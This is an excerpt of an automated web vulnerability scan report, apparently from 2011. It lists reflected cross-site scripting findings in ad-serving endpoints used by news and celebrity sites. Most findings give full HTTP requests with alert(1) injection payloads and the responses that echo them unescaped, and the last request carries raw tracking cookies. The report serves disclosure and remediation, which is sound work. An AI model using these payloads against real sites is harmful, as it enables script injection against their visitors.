var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30503457423_1316221793","http://ad.doubleclick.net/adj/q1.bosherald/be_newsc7479'-alert(1)-'d7ae9e9aabb;net=q1;u=,q1-30503457423_1316221793,12298b058f07061,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/be_news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7744'-alert(1)-'53b38ddfa3a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/be_news;sz=a7744'-alert(1)-'53b38ddfa3a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7330
Date: Sat, 17 Sep 2011 01:09:49 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt> ...[SNIP]...
4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:15 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:19 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt> ...[SNIP]...
4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/ent_fr |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent_fr;sz=df0e3'-alert(1)-'44b07b60aae HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 01:20:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt> ...[SNIP]...
4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /cmadj/q1.bosherald/news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/news;sz=48057'-alert(1)-'6d221538d81 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7327
Date: Sat, 17 Sep 2011 01:09:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt> ...[SNIP]...
4.40. http://ad.yieldmanager.com/imp [u parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ad.yieldmanager.com |
| Path: | /imp |
Issue detail
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter. This input was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?anmember=514&anprice=&Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/72a06'%3balert(1)//5908bbe03b7 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; 
bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g